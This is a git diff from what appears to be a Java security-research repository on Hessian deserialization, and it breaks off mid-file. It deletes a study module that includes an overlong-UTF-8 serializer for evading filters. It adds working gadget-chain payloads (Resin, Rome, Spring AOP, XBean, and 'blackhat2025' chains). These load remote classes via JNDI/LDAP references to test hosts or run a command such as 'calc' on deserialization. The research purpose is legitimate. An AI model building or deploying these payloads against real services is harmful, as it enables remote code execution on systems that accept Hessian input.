setFieldValue(s, "size", 2); - Class nodeC; - try { - nodeC = Class.forName("java.util.HashMap$Node"); - } - catch ( ClassNotFoundException e ) { - nodeC = Class.forName("java.util.HashMap$Entry"); - } - Constructor nodeCons = nodeC.getDeclaredConstructor(int.class, - Object.class, Object.class, nodeC); - nodeCons.setAccessible(true); - Object tbl = Array.newInstance(nodeC, 2); - Array.set(tbl, 0, nodeCons.newInstance(0, v1, v1, null)); - Array.set(tbl, 1, nodeCons.newInstance(0, v2, v2, null)); - setFieldValue(s, "table", tbl); - return s; - } -} diff --git a/hessian/HessianStudy/src/main/java/com/hessian/asServlet/Hello.java b/hessian/HessianStudy/src/main/java/com/hessian/asServlet/Hello.java deleted file mode 100644 index 1b722bc..0000000 --- a/hessian/HessianStudy/src/main/java/com/hessian/asServlet/Hello.java +++ /dev/null @@ -1,9 +0,0 @@ -package com.hessian.asServlet; - -import com.hessian.pojo.Person; - -public interface Hello { - public String sayHello(String name); - - public Person changeAge(Person person, int age); -} diff --git a/hessian/HessianStudy/src/main/java/com/hessian/asServlet/HelloClient.java b/hessian/HessianStudy/src/main/java/com/hessian/asServlet/HelloClient.java deleted file mode 100644 index d978ba0..0000000 --- a/hessian/HessianStudy/src/main/java/com/hessian/asServlet/HelloClient.java +++ /dev/null @@ -1,19 +0,0 @@ -package com.hessian.asServlet; - -import com.caucho.hessian.client.HessianProxyFactory; -import com.hessian.pojo.Person; - -import java.net.MalformedURLException; -import java.util.Properties; - -public class HelloClient { - public static void main(String[] args) throws MalformedURLException { - HessianProxyFactory factory = new HessianProxyFactory(); - Hello hello = (Hello) factory.create(Hello.class, "http://127.0.0.1:8081/hello"); - - String name = "1diOt9"; - System.out.println("test: " + hello.sayHello(name)); - - - } -} diff --git a/hessian/HessianStudy/src/main/java/com/hessian/asServlet/HelloServer.java b/hessian/HessianStudy/src/main/java/com/hessian/asServlet/HelloServer.java deleted file mode 100644 index aa503e7..0000000 --- a/hessian/HessianStudy/src/main/java/com/hessian/asServlet/HelloServer.java +++ /dev/null @@ -1,18 +0,0 @@ -package com.hessian.asServlet; - -import com.caucho.hessian.server.HessianServlet; -import com.hessian.pojo.Person; - -public class HelloServer extends HessianServlet implements Hello{ - @Override - public String sayHello(String name) { - System.out.println("Hello " + name); - return "Hello " + name; - } - - @Override - public Person changeAge(Person person, int age) { - person.setAge(age); - return person; - } -} diff --git a/hessian/HessianStudy/src/main/java/com/hessian/deser/DeserTest.java b/hessian/HessianStudy/src/main/java/com/hessian/deser/DeserTest.java deleted file mode 100644 index ea17da0..0000000 --- a/hessian/HessianStudy/src/main/java/com/hessian/deser/DeserTest.java +++ /dev/null @@ -1,20 +0,0 @@ -package com.hessian.deser; - -import com.caucho.hessian.io.Hessian2Input; -import com.hessian.pojo.Person; - -import java.io.FileInputStream; -import java.io.FileNotFoundException; -import java.io.IOException; - -public class DeserTest { - public static void main(String[] args) throws IOException { - FileInputStream fis = new FileInputStream("ser.bin"); - Hessian2Input hessian2Input = new Hessian2Input(fis); - Person obj = (Person) hessian2Input.readObject(); - hessian2Input.close(); - System.out.println(obj.getClass().getName()); - System.out.println(obj.getAge()); - - } -} diff --git a/hessian/HessianStudy/src/main/java/com/hessian/deser/Hessian2OutputWithOverlongEncoding.java b/hessian/HessianStudy/src/main/java/com/hessian/deser/Hessian2OutputWithOverlongEncoding.java deleted file mode 100644 index b69ef4e..0000000 --- a/hessian/HessianStudy/src/main/java/com/hessian/deser/Hessian2OutputWithOverlongEncoding.java +++ /dev/null @@ -1,107 +0,0 @@ -package com.hessian.deser; - -import com.caucho.hessian.io.Hessian2Output; - -import java.io.IOException; -import java.io.OutputStream; -import java.lang.reflect.Field; - -public class Hessian2OutputWithOverlongEncoding extends Hessian2Output { - public Hessian2OutputWithOverlongEncoding(OutputStream os) { - super(os); - } - - @Override - public void printString(String v, int strOffset, int length) throws IOException { - int offset = (int) getSuperFieldValue("_offset"); - byte[] buffer = (byte[]) getSuperFieldValue("_buffer"); - - for (int i = 0; i < length; i++) { - if (SIZE <= offset + 16) { - setSuperFieldValue("_offset", offset); - flushBuffer(); - offset = (int) getSuperFieldValue("_offset"); - } - - char ch = v.charAt(i + strOffset); - - // 2 bytes UTF-8 - buffer[offset++] = (byte) (0xc0 + (convert(ch)[0] & 0x1f)); - buffer[offset++] = (byte) (0x80 + (convert(ch)[1] & 0x3f)); - -// if (ch < 0x80) -// buffer[offset++] = (byte) (ch); -// else if (ch < 0x800) { -// buffer[offset++] = (byte) (0xc0 + ((ch >> 6) & 0x1f)); -// buffer[offset++] = (byte) (0x80 + (ch & 0x3f)); -// } -// else { -// buffer[offset++] = (byte) (0xe0 + ((ch >> 12) & 0xf)); -// buffer[offset++] = (byte) (0x80 + ((ch >> 6) & 0x3f)); -// buffer[offset++] = (byte) (0x80 + (ch & 0x3f)); -// } - } - - setSuperFieldValue("_offset", offset); - } - - @Override - public void printString(char[] v, int strOffset, int length) throws IOException { - int offset = (int) getSuperFieldValue("_offset"); - byte[] buffer = (byte[]) getSuperFieldValue("_buffer"); - - for (int i = 0; i < length; i++) { - if (SIZE <= offset + 16) { - setSuperFieldValue("_offset", offset); - flushBuffer(); - offset = (int) getSuperFieldValue("_offset"); - } - - char ch = v[i + strOffset]; - - // 2 bytes UTF-8 - buffer[offset++] = (byte) (0xc0 + (convert(ch)[0] & 0x1f)); - buffer[offset++] = (byte) (0x80 + (convert(ch)[1] & 0x3f)); - -// if (ch < 0x80) -// buffer[offset++] = (byte) (ch); -// else if (ch < 0x800) { -// buffer[offset++] = (byte) (0xc0 + ((ch >> 6) & 0x1f)); -// buffer[offset++] = (byte) (0x80 + (ch & 0x3f)); -// } -// else { -// buffer[offset++] = (byte) (0xe0 + ((ch >> 12) & 0xf)); -// buffer[offset++] = (byte) (0x80 + ((ch >> 6) & 0x3f)); -// buffer[offset++] = (byte) (0x80 + (ch & 0x3f)); -// } - } - - setSuperFieldValue("_offset", offset); - } - - public int[] convert(int i) { - int b1 = ((i >> 6) & 0b11111) | 0b11000000; - int b2 = (i & 0b111111) | 0b10000000; - return new int[]{ b1, b2 }; - } - - public Object getSuperFieldValue(String name) { - try { - Field f = this.getClass().getSuperclass().getDeclaredField(name); - f.setAccessible(true); - return f.get(this); - } catch (Exception e) { - return null; - } - } - - public void setSuperFieldValue(String name, Object val) { - try { - Field f = this.getClass().getSuperclass().getDeclaredField(name); - f.setAccessible(true); - f.set(this, val); - } catch (Exception e) { - e.printStackTrace(); - } - } -} \ No newline at end of file diff --git a/hessian/HessianStudy/src/main/java/com/hessian/deser/UTF_8_OverLong.java b/hessian/HessianStudy/src/main/java/com/hessian/deser/UTF_8_OverLong.java deleted file mode 100644 index 970ddeb..0000000 --- a/hessian/HessianStudy/src/main/java/com/hessian/deser/UTF_8_OverLong.java +++ /dev/null @@ -1,47 +0,0 @@ -package com.hessian.deser; - -import com.alibaba.fastjson.JSONObject; -import com.caucho.hessian.io.Hessian2Input; -import com.caucho.hessian.io.Hessian2Output; -import com.caucho.hessian.io.SerializerFactory; -import com.hessian.Tools; -import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl; -import com.alibaba.fastjson.JSONArray; -import com.sun.org.apache.xpath.internal.objects.XString; - -import java.io.FileInputStream; -import java.io.FileOutputStream; -import java.io.IOException; -import java.util.HashMap; - -public class UTF_8_OverLong { - public static void main(String[] args) throws Exception { - TemplatesImpl templates = Tools.getTemplatesImpl(); - - JSONArray jsonArray = new JSONArray(); - jsonArray.add(templates); -// jsonArray.toString(); -// JSONArray jsonArray = new JSONArray(); -// jsonArray.add(templates); - XString xString = new XString("xx"); - - HashMap map1 = new HashMap(); - HashMap map2 = new HashMap(); - map1.put("yy",jsonArray); - map1.put("zZ",xString); - map2.put("yy",xString); - map2.put("zZ",jsonArray); - - HashMap hashMap = Tools.makeMap(map1, map2); - - FileOutputStream fos = new FileOutputStream("D://1tmp//utf8.bin"); - Hessian2OutputWithOverlongEncoding output = new Hessian2OutputWithOverlongEncoding(fos); - output.setSerializerFactory(new SerializerFactory()); - output.getSerializerFactory().setAllowNonSerializable(true); - output.writeObject(hashMap); - output.close(); - -// FileInputStream fis = new FileInputStream("utf8.bin"); -// new Hessian2Input(fis).readObject(); - } -} diff --git a/hessian/HessianStudy/src/main/java/com/hessian/pojo/Person.java b/hessian/HessianStudy/src/main/java/com/hessian/pojo/Person.java deleted file mode 100644 index 6df809b..0000000 --- a/hessian/HessianStudy/src/main/java/com/hessian/pojo/Person.java +++ /dev/null @@ -1,27 +0,0 @@ -package com.hessian.pojo; - -import java.util.HashMap; -import java.util.Properties; - -public class Person implements java.io.Serializable { - private String name; - private int age; -// private HashMap map; - - public Person() { - } - - public Person(String name, int age) { - this.name = name; - this.age = age; -// this.map = map; - } - - public int getAge() { - return age; - } - - public void setAge(int age) { - this.age = age; - } -} diff --git a/hessian/HessianStudy/src/main/java/com/hessian/ser/SerTest.java b/hessian/HessianStudy/src/main/java/com/hessian/ser/SerTest.java deleted file mode 100644 index 16cc623..0000000 --- a/hessian/HessianStudy/src/main/java/com/hessian/ser/SerTest.java +++ /dev/null @@ -1,28 +0,0 @@ -package com.hessian.ser; - -import com.caucho.hessian.io.Hessian2Input; -import com.caucho.hessian.io.Hessian2Output; -import com.hessian.pojo.Person; - -import java.io.*; -import java.util.HashMap; - -public class SerTest { - public static void main(String[] args) throws IOException { - HashMap hashMap = new HashMap<>(); - hashMap.put("name", "maxyyy"); - - Person person = new Person("1diOt9", 20); -// FileOutputStream fos = new FileOutputStream("ser.bin"); - ByteArrayOutputStream baos = new ByteArrayOutputStream(); - Hessian2Output output = new Hessian2Output(baos); - output.writeObject(hashMap); - output.close(); - byte[] bytes = baos.toByteArray(); - - ByteArrayInputStream bais = new ByteArrayInputStream(bytes); - Hessian2Input input = new Hessian2Input(bais); - input.readObject(); - input.close(); - } -} diff --git a/hessian/dubbo/src/main/java/org/example/Main.java b/hessian/dubbo/src/main/java/org/example/Main.java deleted file mode 100644 index 407f157..0000000 --- a/hessian/dubbo/src/main/java/org/example/Main.java +++ /dev/null @@ -1,7 +0,0 @@ -package org.example; - -public class Main { - public static void main(String[] args) { - System.out.println("Hello world!"); - } -} \ No newline at end of file diff --git a/hessian/pom.xml b/hessian/pom.xml new file mode 100644 index 0000000..58283dd --- /dev/null +++ b/hessian/pom.xml @@ -0,0 +1,81 @@ + + + 4.0.0 + + com.rois + Hessian + 1.0-SNAPSHOT + + + 8 + 8 + UTF-8 + + + + + org.javassist + javassist + 3.30.2-GA + + + com.caucho + hessian + 4.0.60 + + + com.caucho + resin + 4.0.63 + + + org.apache.xbean + xbean-naming + 4.24 + + + javax.servlet + javax.servlet-api + 4.0.1 + + + javax.annotation + javax.annotation-api + 1.3.2 + + + + rome + rome + 1.0 + + + org.springframework.boot + spring-boot-starter-web + 2.7.18 + + + + + + + + + + + + + org.aspectj + aspectjweaver + 1.9.22.1 + + + com.alibaba + fastjson + 1.2.47 + + + + \ No newline at end of file diff --git a/hessian/src/main/java/com/test/HessianTest.java b/hessian/src/main/java/com/test/HessianTest.java new file mode 100644 index 0000000..13a6f04 --- /dev/null +++ b/hessian/src/main/java/com/test/HessianTest.java @@ -0,0 +1,52 @@ +package com.test; + +import com.caucho.hessian.io.Hessian2Input; +import com.caucho.hessian.io.Hessian2Output; +import com.caucho.hessian.io.HessianInput; +import com.caucho.hessian.io.HessianOutput; +import com.test.pojo.Person; + +import java.io.ByteArrayInputStream; +import java.io.ByteArrayOutputStream; +import java.io.IOException; + +public class HessianTest { + public static void main(String[] args) throws IOException { + Person baka = new Person(1, "baka"); + byte[] bytes = hessianSer2bytes(baka); + Person deser = (Person) hessianDeser(bytes); + System.out.println(deser.getName()); + } + + public static byte[] hessian2Ser2bytes(Object obj) throws IOException { + ByteArrayOutputStream baos = new ByteArrayOutputStream(); + Hessian2Output hessian2Output = new Hessian2Output(baos); + hessian2Output.writeObject(obj); + hessian2Output.close(); + return baos.toByteArray(); + } + + public static Object hessian2Deser(byte[] bytes) throws IOException { + ByteArrayInputStream bais = new ByteArrayInputStream(bytes); + Hessian2Input hessian2Input = new Hessian2Input(bais); + Object o = hessian2Input.readObject(); + hessian2Input.close(); + return o; + } + + public static byte[] hessianSer2bytes(Object obj) throws IOException { + ByteArrayOutputStream baos = new ByteArrayOutputStream(); + HessianOutput hessianOutput = new HessianOutput(baos); + hessianOutput.writeObject(obj); + hessianOutput.close(); + return baos.toByteArray(); + } + + public static Object hessianDeser(byte[] bytes) throws IOException { + ByteArrayInputStream bais = new ByteArrayInputStream(bytes); + HessianInput hessianInput = new HessianInput(bais); + Object o = hessianInput.readObject(); + hessianInput.close(); + return o; + } +} diff --git a/hessian/src/main/java/com/test/client/HessianClient.java b/hessian/src/main/java/com/test/client/HessianClient.java new file mode 100644 index 0000000..c098b17 --- /dev/null +++ b/hessian/src/main/java/com/test/client/HessianClient.java @@ -0,0 +1,15 @@ +package com.test.client; + +import com.caucho.hessian.client.HessianProxyFactory; +import com.test.server.Service; + +import java.net.MalformedURLException; + +public class HessianClient { + public static void main(String[] args) throws MalformedURLException { + String url="http://localhost:8080/MyTomcat/hessian"; + HessianProxyFactory factory=new HessianProxyFactory(); + Service service=(Service) factory.create(Service.class, url); + System.out.println(service.getCurrentTime()); + } +} diff --git a/hessian/src/main/java/com/test/gadget/ResinGadget.java b/hessian/src/main/java/com/test/gadget/ResinGadget.java new file mode 100644 index 0000000..1017b51 --- /dev/null +++ b/hessian/src/main/java/com/test/gadget/ResinGadget.java @@ -0,0 +1,58 @@ +package com.test.gadget; + +import com.caucho.hessian.io.Hessian2Input; +import com.caucho.hessian.io.Hessian2Output; +import com.caucho.hessian.io.SerializerFactory; +import com.caucho.naming.QName; +import com.sun.org.apache.xpath.internal.objects.XString; +import tools.HessianTools; +import tools.ReflectTools; +import tools.UnsafeTools; + +import javax.naming.CannotProceedException; +import javax.naming.Context; +import javax.naming.Reference; +import java.io.ByteArrayInputStream; +import java.io.ByteArrayOutputStream; +import java.lang.reflect.Constructor; +import java.lang.reflect.Field; +import java.lang.reflect.InvocationTargetException; +import java.util.HashMap; +import java.util.Hashtable; + +import static com.test.gadget.blackhat2025.XStringFSB2toString.unhash; + +public class ResinGadget { + public static void main(String[] args) throws Exception { + Object object = getObject(); + byte[] bytes = HessianTools.hessian2Ser2bytes(object); + HessianTools.hessian2Deser(bytes); + } + + public static Object getObject() throws Exception { + String refAddr = "http://127.0.0.1:8000/"; + String refClassName = "Calc"; + + Reference ref = new Reference(refClassName, refClassName, refAddr); + + Object cannotProceedException = Class.forName("javax.naming.CannotProceedException").getDeclaredConstructor().newInstance(); + ReflectTools.setFieldValue(cannotProceedException, "resolvedObj", ref); + + Class contiC = Class.forName("javax.naming.spi.ContinuationContext"); + Context continuationContext = (Context) UnsafeTools.getObjectByUnsafe(contiC); + ReflectTools.setFieldValue(continuationContext, "cpe", cannotProceedException); + ReflectTools.setFieldValue(continuationContext, "env", new Hashtable()); + + // 创建QName + QName qName = new QName(continuationContext, "aaa", "bbb"); + // 实现hash碰撞 + String str = unhash(qName.hashCode()); + // 创建Xtring + XString xString = new XString(str); + + // 创建HashMap + HashMap finalMap = ReflectTools.makeMap(qName, xString); + + return finalMap; + } +} diff --git a/hessian/src/main/java/com/test/gadget/RomeBased.java b/hessian/src/main/java/com/test/gadget/RomeBased.java new file mode 100644 index 0000000..47189a0 --- /dev/null +++ b/hessian/src/main/java/com/test/gadget/RomeBased.java @@ -0,0 +1,71 @@ +package com.test.gadget; + +import com.sun.rowset.JdbcRowSetImpl; +import com.sun.syndication.feed.impl.EqualsBean; +import com.sun.syndication.feed.impl.ToStringBean; +import tools.HessianTools; +import tools.ReflectTools; +import tools.TemplatesGen; + +import javax.xml.transform.Templates; +import java.security.*; +import java.util.HashMap; + +public class RomeBased { + public static void main(String[] args) throws Exception { + rome2SignedObj(); + } + + public static void rome2Jndi() throws Exception { + JdbcRowSetImpl jdbcRowSet = new JdbcRowSetImpl(); + jdbcRowSet.setDataSourceName("ldap://127.0.0.1:50389/eae633"); + + ToStringBean toStringBean = new ToStringBean(JdbcRowSetImpl.class, jdbcRowSet); + EqualsBean equalsBean = new EqualsBean(ToStringBean.class, toStringBean); + HashMap hashMap = ReflectTools.makeMap(equalsBean, "any"); + + byte[] bytes = HessianTools.hessianSer2bytes(hashMap); + HessianTools.hessianDeser(bytes); + } + + // 二次反序列化 + // 会触发三次，因为ToStringBean.printProperty间接触发两次EqualsBean.hashCode + public static void rome2SignedObj() throws Exception { + Templates templates = TemplatesGen.getTemplates(null, "D:/1tmp/classes/CalcAbs.class"); + ToStringBean toStringBean = new ToStringBean(Templates.class, templates); + EqualsBean equalsBean = new EqualsBean(ToStringBean.class, toStringBean); + HashMap hashMap = ReflectTools.makeMap(equalsBean, "any"); + + // 初始化 SignedObject 所需的密钥和签名工具 + KeyPairGenerator keyPairGenerator = KeyPairGenerator.getInstance("DSA"); + keyPairGenerator.initialize(1024); + KeyPair keyPair = keyPairGenerator.genKeyPair(); + PrivateKey privateKey = keyPair.getPrivate(); + Signature signingEngine = Signature.getInstance("DSA"); + // 创建 SignedObject 对象，对 map 进行签名 + SignedObject signedObject = new SignedObject(hashMap, privateKey, signingEngine); + + + ToStringBean toStringBean2 = new ToStringBean(SignedObject.class, signedObject); + EqualsBean equalsBean2 = new EqualsBean(ToStringBean.class, toStringBean2); + HashMap hashMap2 = ReflectTools.makeMap(equalsBean2, "any"); + + byte[] bytes = HessianTools.hessianSer2bytes(hashMap2); + HessianTools.hessianDeser(bytes); + + + } + + + // 失败，因为hessian无法反序列化transit和static变量 + public static void rome2Templates() throws Exception { + Templates templates = TemplatesGen.getTemplates(null, "D:/1tmp/classes/Calc.class"); + ToStringBean toStringBean = new ToStringBean(Templates.class, templates); + EqualsBean equalsBean = new EqualsBean(ToStringBean.class, toStringBean); +// equalsBean.hashCode(); + HashMap hashMap = ReflectTools.makeMap(equalsBean, "any"); + + byte[] bytes = HessianTools.hessianSer2bytes(hashMap); + HessianTools.hessianDeser(bytes); + } +} diff --git a/hessian/src/main/java/com/test/gadget/SpringBased.java b/hessian/src/main/java/com/test/gadget/SpringBased.java new file mode 100644 index 0000000..6301a9b --- /dev/null +++ b/hessian/src/main/java/com/test/gadget/SpringBased.java @@ -0,0 +1,82 @@ +package com.test.gadget; + +import com.sun.org.apache.xpath.internal.objects.XString; +import org.springframework.aop.aspectj.AbstractAspectJAdvice; +import org.springframework.aop.aspectj.AspectJAroundAdvice; +import org.springframework.aop.aspectj.AspectJPointcutAdvisor; +import org.springframework.aop.aspectj.annotation.BeanFactoryAspectInstanceFactory; +import org.springframework.aop.support.DefaultBeanFactoryPointcutAdvisor; +import org.springframework.aop.support.DefaultPointcutAdvisor; +import org.springframework.aop.target.HotSwappableTargetSource; +import org.springframework.jndi.support.SimpleJndiBeanFactory; +import tools.HessianTools; +import tools.ReflectTools; +import tools.UnsafeTools; + +import java.util.HashMap; +import java.util.HashSet; +import java.util.Set; + +public class SpringBased { + public static void main(String[] args) throws Exception { + Object o = pointcutAdvisor(); + byte[] bytes = HessianTools.hessian2Ser2bytes(o); + HessianTools.hessian2Deser(bytes); + } + + public static Object advisorHolder() throws Exception { + String url = "ldap://127.0.0.1:50389/d64c0c"; + SimpleJndiBeanFactory simpleJndiBeanFactory = new SimpleJndiBeanFactory(); + Set set = new HashSet(); + set.add("any"); + + // 直接通过构造方法会提前执行 + BeanFactoryAspectInstanceFactory beanFactoryAspectInstanceFactory = (BeanFactoryAspectInstanceFactory) UnsafeTools.getObjectByUnsafe(BeanFactoryAspectInstanceFactory.class); + ReflectTools.setFinalField(beanFactoryAspectInstanceFactory, "beanFactory", simpleJndiBeanFactory); + ReflectTools.setFinalField(beanFactoryAspectInstanceFactory, "name", url); + + AbstractAspectJAdvice aspectJAroundAdvice = (AbstractAspectJAdvice) UnsafeTools.getObjectByUnsafe(AspectJAroundAdvice.class); + ReflectTools.setFieldValue(aspectJAroundAdvice, "aspectInstanceFactory", beanFactoryAspectInstanceFactory); + + AspectJPointcutAdvisor aspectJPointcutAdvisor = (AspectJPointcutAdvisor) UnsafeTools.getObjectByUnsafe(AspectJPointcutAdvisor.class); + ReflectTools.setFieldValue(aspectJPointcutAdvisor, "advice", aspectJAroundAdvice); + ReflectTools.setFieldValue(aspectJPointcutAdvisor, "order", null); + + Class aClass = Class.forName("org.springframework.aop.aspectj.autoproxy.AspectJAwareAdvisorAutoProxyCreator$PartiallyComparableAdvisorHolder"); + Object objectByUnsafe = UnsafeTools.getObjectByUnsafe(aClass); + ReflectTools.setFieldValue(objectByUnsafe, "advisor", aspectJPointcutAdvisor); + + Object xString = UnsafeTools.getObjectByUnsafe(XString.class); + HotSwappableTargetSource hotSwappableTargetSource = new HotSwappableTargetSource(xString); + HotSwappableTargetSource other = new HotSwappableTargetSource(objectByUnsafe); + + HashMap hashMap = ReflectTools.makeMap(other, hotSwappableTargetSource); + + + return hashMap; + } + + public static Object pointcutAdvisor() throws Exception { + String url = "ldap://127.0.0.1:50389/d64c0c"; + SimpleJndiBeanFactory simpleJndiBeanFactory = new SimpleJndiBeanFactory(); + Set set = new HashSet(); + set.add(url); + ReflectTools.setFieldValue(simpleJndiBeanFactory, "shareableResources", set); + + + + Object defaultBeanFactoryPointcutAdvisor = UnsafeTools.getObjectByUnsafe(DefaultBeanFactoryPointcutAdvisor.class); + ReflectTools.setFieldValue(defaultBeanFactoryPointcutAdvisor, "beanFactory", simpleJndiBeanFactory); + ReflectTools.setFieldValue(defaultBeanFactoryPointcutAdvisor, "adviceBeanName", url); + + // AbstractPointcutAdvisor的子类，且没实现equals方法的都行, AsyncAnnotationAdvisor\DefaultPointcutAdvisor + Object defaultPointcutAdvisor = UnsafeTools.getObjectByUnsafe(DefaultPointcutAdvisor.class); + HotSwappableTargetSource hotSwappableTargetSource = new HotSwappableTargetSource(defaultPointcutAdvisor); + HotSwappableTargetSource other = new HotSwappableTargetSource(defaultBeanFactoryPointcutAdvisor); + + HashMap hashMap = ReflectTools.makeMap(other, hotSwappableTargetSource); + + return hashMap; + } + +} diff --git a/hessian/src/main/java/com/test/gadget/XBeanGadget.java b/hessian/src/main/java/com/test/gadget/XBeanGadget.java new file mode 100644 index 0000000..58f16a5 --- /dev/null +++ b/hessian/src/main/java/com/test/gadget/XBeanGadget.java @@ -0,0 +1,38 @@ +package com.test.gadget; + +import com.sun.org.apache.xpath.internal.objects.XString; +import org.apache.xbean.naming.context.WritableContext; +import org.springframework.aop.target.HotSwappableTargetSource; +import tools.HessianTools; +import tools.ReflectTools; + +import javax.naming.Context; +import javax.naming.NamingException; +import javax.naming.Reference; +import java.util.HashMap; + +public class XBeanGadget { + public static void main(String[] args) throws Exception { + Object payload = getPayload(); + byte[] bytes = HessianTools.hessian2Ser2bytes(payload); + HessianTools.hessian2Deser(bytes); + } + + public static Object getPayload() throws Exception { + String refAddr = "http://127.0.0.1:8000/"; + String refClassName = "Calc"; + + Reference ref = new Reference(refClassName, refClassName, refAddr); + WritableContext writableContext = new WritableContext(); + + // 创建ReadOnlyBinding对象 + String classname = "org.apache.xbean.naming.context.ContextUtil$ReadOnlyBinding"; + Object readOnlyBinding = Class.forName(classname).getDeclaredConstructor(String.class, Object.class, Context.class).newInstance("aaa", ref, writableContext); + + XString xString = new XString("any"); + + HashMap finalMap = ReflectTools.makeEqualMap(xString, readOnlyBinding); + + return finalMap; + } +} diff --git a/hessian/src/main/java/com/test/gadget/blackhat2025/AudioFileFormat2toString.java b/hessian/src/main/java/com/test/gadget/blackhat2025/AudioFileFormat2toString.java new file mode 100644 index 0000000..6e979b9 --- /dev/null +++ b/hessian/src/main/java/com/test/gadget/blackhat2025/AudioFileFormat2toString.java @@ -0,0 +1,54 @@ +package com.test.gadget.blackhat2025; + +import com.alibaba.fastjson.JSONArray; +import com.sun.corba.se.impl.activation.ServerManagerImpl; +import com.sun.corba.se.impl.activation.ServerTableEntry; +import com.sun.deploy.nativesandbox.IntegrityProcess; +import javafx.beans.property.IntegerProperty; +import tools.HessianTools; +import tools.ReflectTools; +import tools.UnsafeTools; + +import javax.sound.sampled.AudioFileFormat; +import java.util.HashMap; + +public class AudioFileFormat2toString { + public static void main(String[] args) throws Exception { + Object payload = getPayload(); + byte[] bytes = HessianTools.hessian2Ser2bytes(payload); + HessianTools.hessian2Deser(bytes); + } + + public static Object getPayload() throws Exception { + Object entry = UnsafeTools.getObjectByUnsafe(ServerTableEntry.class); + // process.exit不能报错；linux下使用UNIXProcess即可 + Object process = UnsafeTools.getObjectByUnsafe(IntegrityProcess.class); + ReflectTools.setFieldValue(entry, "state", 2); + ReflectTools.setFieldValue(entry, "process", process); + ReflectTools.setFieldValue(entry, "activationCmd", "calc"); + + HashMap hashMap = new HashMap<>(); + // 键一定是Integer + hashMap.put(1, entry); + + Object serverManager = UnsafeTools.getObjectByUnsafe(ServerManagerImpl.class); + ReflectTools.setFieldValue(serverManager, "serverTable", hashMap); + + JSONArray jsonArray = new JSONArray(); + jsonArray.add(serverManager); + + HashMap hashMap1 = new HashMap<>(); + HashMap hashMap2 = new HashMap<>(); + Object type = UnsafeTools.getObjectByUnsafe(AudioFileFormat.Type.class); + hashMap1.put("1", jsonArray); + hashMap1.put("2", type); + hashMap2.put("1", type); + hashMap2.put("2", jsonArray); + + HashMap finalMap = new HashMap<>(); + finalMap.put(hashMap1, "any"); + finalMap.put(hashMap2, "any"); + + return finalMap; + } +} diff --git a/hessian/src/main/java/com/test/gadget/blackhat2025/ConcurrentHashMap2equals.java b/hessian/src/main/java/com/test/gadget/blackhat2025/ConcurrentHashMap2equals.java new file mode 100644 index 0000000..6a68d8a --- /dev/null +++ b/hessian/src/main/java/com/test/gadget/blackhat2025/ConcurrentHashMap2equals.java @@ -0,0 +1,59 @@ +package com.test.gadget.blackhat2025; + +import com.alibaba.fastjson.JSONArray; +import com.sun.corba.se.impl.activation.ServerManagerImpl; +import com.sun.corba.se.impl.activation.ServerTableEntry; +import com.sun.deploy.nativesandbox.IntegrityProcess; +import com.sun.org.apache.xpath.internal.objects.XStringForFSB; +import tools.HessianTools; +import tools.ReflectTools; +import tools.UnsafeTools; + +import javax.sound.sampled.AudioFileFormat; +import java.util.HashMap; +import java.util.concurrent.ConcurrentHashMap; +import java.util.concurrent.ConcurrentMap; + +public class ConcurrentHashMap2equals { + public static void main(String[] args) throws Exception { + Object payload = getPayload(); + byte[] bytes = HessianTools.hessian2Ser2bytes(payload); + HessianTools.hessian2Deser(bytes); + } + + public static Object getPayload() throws Exception { + Object entry = UnsafeTools.getObjectByUnsafe(ServerTableEntry.class); + // process.exit不能报错；linux下使用UNIXProcess即可 + Object process = UnsafeTools.getObjectByUnsafe(IntegrityProcess.class); + ReflectTools.setFieldValue(entry, "state", 2); + ReflectTools.setFieldValue(entry, "process", process); + ReflectTools.setFieldValue(entry, "activationCmd", "calc"); + + HashMap hashMap = new HashMap<>(); + // 键一定是Integer + hashMap.put(1, entry); + + Object serverManager = UnsafeTools.getObjectByUnsafe(ServerManagerImpl.class); + ReflectTools.setFieldValue(serverManager, "serverTable", hashMap); + + JSONArray jsonArray = new JSONArray(); + jsonArray.add(serverManager); + + Object audio = UnsafeTools.getObjectByUnsafe(AudioFileFormat.Type.class); + +// Object xString = UnsafeTools.getObjectByUnsafe(XStringForFSB.class); +// ReflectTools.setFieldValue(xString, "m_strCache", "notNull1"); + + Class aClass = Class.forName("java.util.concurrent.ConcurrentHashMap$MapEntry"); + Object conHashMap1 = UnsafeTools.getObjectByUnsafe(aClass); + Object conHashMap2 = UnsafeTools.getObjectByUnsafe(aClass); + ReflectTools.setFieldValue(conHashMap1, "key", audio); + ReflectTools.setFieldValue(conHashMap1, "val", jsonArray); + ReflectTools.setFieldValue(conHashMap2, "key", jsonArray); + ReflectTools.setFieldValue(conHashMap2, "val", audio); + + ConcurrentHashMap finalMap = ReflectTools.makeConcurrentMap(conHashMap1, conHashMap2); + + return finalMap; + } +} diff --git a/hessian/src/main/java/com/test/gadget/blackhat2025/XStringFSB2toString.java b/hessian/src/main/java/com/test/gadget/blackhat2025/XStringFSB2toString.java new file mode 100644 index 0000000..a792e77 --- /dev/null +++ b/hessian/src/main/java/com/test/gadget/blackhat2025/XStringFSB2toString.java @@ -0,0 +1,92 @@ +package com.test.gadget.blackhat2025; + +import com.alibaba.fastjson.JSONArray; +import com.sun.corba.se.impl.activation.ServerManagerImpl; +import com.sun.corba.se.impl.activation.ServerTableEntry; +import com.sun.deploy.nativesandbox.IntegrityProcess; +import com.sun.org.apache.xpath.internal.objects.XStringForFSB; +import tools.HessianTools; +import tools.ReflectTools; +import tools.UnsafeTools; + +import java.util.AbstractMap; +import java.util.HashMap; + +public class XStringFSB2toString { + public static void main(String[] args) throws Exception { + Object payload = getPayload(); + byte[] bytes = HessianTools.hessian2Ser2bytes(payload); + HessianTools.hessian2Deser(bytes); + } + + public static Object getPayload() throws Exception { + Object entry = UnsafeTools.getObjectByUnsafe(ServerTableEntry.class); + // process.exit不能报错；linux下使用UNIXProcess即可 + Object process = UnsafeTools.getObjectByUnsafe(IntegrityProcess.class); + ReflectTools.setFieldValue(entry, "state", 2); + ReflectTools.setFieldValue(entry, "process", process); + ReflectTools.setFieldValue(entry, "activationCmd", "calc"); + + HashMap hashMap = new HashMap<>(); + // 键一定是Integer + hashMap.put(1, entry); + + Object serverManager = UnsafeTools.getObjectByUnsafe(ServerManagerImpl.class); + ReflectTools.setFieldValue(serverManager, "serverTable", hashMap); + + JSONArray jsonArray = new JSONArray(); + jsonArray.add(serverManager); + + Object xString = UnsafeTools.getObjectByUnsafe(XStringForFSB.class); +// String unhash = unhash(jsonArray.hashCode()); + 